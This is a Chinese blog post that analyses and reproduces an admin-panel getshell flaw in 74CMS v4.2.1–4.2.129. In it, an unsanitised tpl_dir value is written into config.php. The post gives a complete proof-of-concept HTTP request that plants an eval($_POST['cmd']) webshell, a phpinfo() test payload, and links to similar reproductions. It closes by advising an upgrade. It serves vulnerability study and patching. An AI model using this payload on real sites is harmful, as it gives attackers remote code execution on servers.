74CMS_v4.2.1-v4.2.129后台Getshell

最新推荐文章于 2025-09-07 16:43:14 发布
原创 最新推荐文章于 2025-09-07 16:43:14 发布 · 1.3k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细分析了74CMS管理系统存在的后台Getshell漏洞,该漏洞允许攻击者通过篡改模板路径参数,向配置文件写入恶意代码,从而获取服务器权限。漏洞存在于TplController.class.php的set函数中,通过构造特殊payload能成功执行PHP代码。修复建议是升级到74CMS的最新版本以避免风险。

影响范围

74CMS v4.2.1~v4.2.129

漏洞危害

后台Getshell

攻击类型

后台Getshell

利用条件

登陆后台

漏洞简介

74CMS管理后台在更换模板时由于模板的路径参数可控且对参数的安全性考虑不全导致该参数可控,最终攻击者可以利用该处的设计向配置文件写入一句话木马,并Getshell。
 

漏洞分析

漏洞触发位置为TplController.class.php文件中的set函数:
 
74cms_Home_Setup_v4.2.111\74cms_v4.2.111\upload\Application\Admin\Controller\TplController.class.php
从上面可以看到从请求包中获取到的tpl_dir只是进行了一个简单的过滤——去除两边的空格,之后调用“_get_templates_info”来获取模板的信息:
 
之后使用“ads_init”来配置当前主题下的广告位置布局信息
 
 
最后使用updateconfig来更新配置信息,并将之前设置的配置内容写入文件:
 
由此可知,我们之前写入的tpl_dir值最终会被写入config.php文件,而初始情况下config.php为一个数组:
所以我们最后写入的tpl_dir内容文件会代替此处的default,由此可知我们可以构造特殊payload来闭合单引号插入恶意代码最终getshell!
 

漏洞复现

首先下载漏洞环境,之后通过PHPstudy搭建漏洞测试环境:
 
之后使用安装时设置的管理员账号密码进行登录
 
之后依次点击"工具"——》"风格模板",之后点击"可用模板",同时使用burpsuite抓包:
 
 
 
之后修改“tpl_dir”的值为“ ', 'a',phpinfo(),' ”:
之后可以看到成功向配置文件中写入了之前构造的php代码:
 
之后在浏览器中访问可成功执行phpinfo():
 
同时我们也可以构造一句话木马:
GET /74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_POST['cmd']),' HTTP/1.1
Host: 192.168.174.160
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.174.160/74cms/index.php?m=admin&c=tpl&a=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ptacfv3e96fo666m97k6t21su5; think_language=zh-CN; think_template=default
Connection: close

写入后config.php文件内容如下:
之后使用Firefox中的hackbar进行测试与命令执行:
 
之后使用蚁剑可以成功连接并getshell
 
 

漏洞POC

GET /74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_POST['cmd']),' HTTP/1.1
Host: 192.168.174.160
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.174.160/74cms/index.php?m=admin&c=tpl&a=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ptacfv3e96fo666m97k6t21su5; think_language=zh-CN; think_template=default
Connection: close

修复建议

升级74CMS到最新版本
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
漏洞复现】74cms v4.2.1 v4.2.129 后台getshell漏洞
失心少年
10-25 497
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。厂商:74cms 下载地址:http://www.74cms.com/download/index.html 关于版本: 新版的74cms采用了tp3.2.3重构了,所以可知底层是tp,74cms新版升级是后台升级的,所以先将将升级方法。
74cms v4.2.1-v4.2.129-后台getshell漏洞复现
浅笑996的博客
06-28 1376
0x00 影响范围 v4.2.1-v4.2.129 0x01 环境搭建 1. 先去官网下载 骑士人才系统基础版(安装包) 2.将下载好的包进行安装 0x02 复现过程 当前版本v4.2.111 点加工具,点击风格模板 Payload: http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),' shell地址: http://127.0....
74CMS 5.0.1后台getshell(CVE-2020-35339)分析
qq_41252520的博客
02-18 3296
0x0 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的
74cms骑士人才招聘系统源码SE版 v3.16.0
最新发布
破损的天堂鸟博客
09-07 292
74cms骑士人才招聘系统源码SE版 v3.16.0。WEB服务:Apache/Nginx/IIS。PHP版本:5.5及以上(建议7.0以上)MySQL版本:5.7.6及以上。更多同类源码分享,欢迎关注。系统环境:WIN/LIN。
74cms v4.2.1-v4.2.129-后台getshell漏洞 复现
qq_43508668的博客
06-10 532
0x00 影响范围 v4.2.1-v4.2.129 0X01 环境搭建 74CMS官网 下载 v4.2.1-v4.2.129 0X02 漏洞复现 Payload: http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),' shell地址: http://127.0.0.1/74cms/Application/Home/Conf/config.php 路径:\74cms\up
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
04-08
标题和描述中提到的“74cms v4.2.1 v4.2.129 后台getshell漏洞”,意指该版本的74cms存在后端管理界面的安全漏洞,攻击者可通过特定操作获取系统shell,即获得服务器的命令行操作权限。这是网络安全领域极为严重的一...
74cms 4.2.1-129后台getshell漏洞利用教程
74cms v4.2.1 及其后续版本 v4.2.129 存在一个后台getshell漏洞。这个漏洞出现在74cms平台的管理后台部分,由于采用了ThinkPHP框架的3.2.3版本进行重构,因此其底层逻辑与TP相关。漏洞的关键在于版本升级过程中,...
Awesome-POC-master.zip
05-18
74cms v4.2.1 v4.2.129 后台getshell漏洞 74cms v5.0.1 后台跨站请求伪造漏洞 CVE-2019-11374 Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342 AspCMS commentList.asp SQL注入漏洞 BloofoxCMS 0.5.2.1 存储型XSS ...
74cms php在那个文件夹里面,74cms后台getshell
weixin_39775976的博客
03-27 301
前言没有getshell的审计都是耍流氓。今天突然灵光闪现,重新看了下74cms,终于拿下了。正文在Application/Common/Controller/BackendController.class.php有这么一段可怕的代码public function update_config($new_config, $config_file = '') {!is_file($config_fil...
74CMS 5.0.1后台RCE复现过程
weixin_45821250的博客
12-12 2817
74CMS 5.0.1后台getshell(CVE-2020-35339)复现过程
74cms 骑士人才系统 v5.0.1 正式版
10-02
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创
74cms 4.2.3模板
07-08
74cms4.2.3模板,大家测试用,如果其他需要,可以更贴留言,共同讨论研究
74cms 骑士人才系统 v4.2.3 正式版
12-01
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创
74cms骑士人才招聘系统源码SE版 v3.16.0.zip
03-18
74cms骑士人才招聘系统源码SE版 v3.16.0.zip
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
03-25
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
PHP7CMS 无条件前台GETSHELL
xiaoi123的博客
12-20 586
PHP7CMS 无条件前台GETSHELL Version:2018-10-09 //最新版中以修复此漏洞 这个漏洞很简单,如果作者在写代码的时候考虑到一点点安全方面,其实都可以避免的。 01 02 03 04 05 06 07 08 09 10 11 12 // php7...
74cms 6.0.20 getshell
m0_51377238的博客
12-16 930
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。http://serverName/index.php/模块/控制器/操作m参数表示模块,c参数表示控制器,a参数表示操作/方法,后面的表示其他GET参数。
74cms v6.0.48模版注入+文件包含getshell复现
qq_41814777的博客
03-14 5948
漏洞描述 74cms由于函数过滤不严格导致攻击者可以通过构造执行任意代码 影响版本 骑士 CMS < 6.0.48 风险等级 高 漏洞环境搭建 74 cms: 74cms_Home_Setup_v6.0.20.zip 系统:ubuntu18.04.5 php环境:php 5.6 系统镜像:http://old-releases.ubuntu.com/releases/ web源码下载:https://www.74cms.com/download/index.html 准备好后直接把源码放到var/
make-4.2.1-xx.el8.x86_64.rpm麒麟系统
06-14
### 如何在麒麟系统上查找或下载 `make-4.2.1-xx.el8.x86_64.rpm` 软件包 在麒麟操作系统(Kylin OS)上,若需要查找或下载特定的 RPM 包,例如 `make-4.2.1-xx.el8.x86_64.rpm`,可以采用以下方法: #### 方法一:通过官方软件仓库安装 麒麟操作系统通常维护了官方的软件仓库,用户可以通过 `dnf` 或 `yum` 命令来搜索和安装所需的软件包。运行以下命令以检查是否可以从官方仓库中获取 `make` 的相关版本[^1]: ```bash dnf search make ``` 如果找到匹配的软件包,可以直接使用以下命令进行安装: ```bash dnf install make ``` #### 方法二:手动下载 RPM 包 如果需要特定版本的 RPM 包(如 `make-4.2.1-xx.el8.x86_64.rpm`),可以访问麒麟操作系统的官方镜像站点或其他可信的 RPM 仓库。常见的 RPM 仓库包括但不限于: - 麒麟操作系统官网 - CentOS 或 RHEL 的官方镜像站点(由于麒麟基于 RHEL/CentOS,这些站点可能包含兼容的 RPM 包) 通过浏览器访问上述站点,搜索关键字 `make-4.2.1-xx.el8.x86_64.rpm` 并下载。下载完成后,可以使用以下命令安装: ```bash rpm -ivh make-4.2.1-xx.el8.x86_64.rpm ``` #### 方法三:使用第三方工具或脚本 如果以上方法未能满足需求,还可以考虑使用第三方工具如 `rpmfind.net` 搜索所需的 RPM 包。例如,在浏览器中输入以下 URL 进行搜索: ``` https://rpmfind.net/linux/rpm2html/search.php?query=make-4.2.1-xx.el8.x86_64.rpm ``` 下载后同样可以通过 `rpm` 命令完成安装。 #### 注意事项 在安装非官方来源的 RPM 包时,请务必验证其来源的可靠性,以避免潜在的安全风险。此外,确保目标 RPM 包与当前系统架构(如 x86_64)和版本(如 EL8)兼容[^2]。 ```python # 示例代码:验证已安装的 make 版本 import subprocess def check_make_version(): result = subprocess.run(['make', '--version'], stdout=subprocess.PIPE) return result.stdout.decode('utf-8').split('\n')[0] print(check_make_version()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值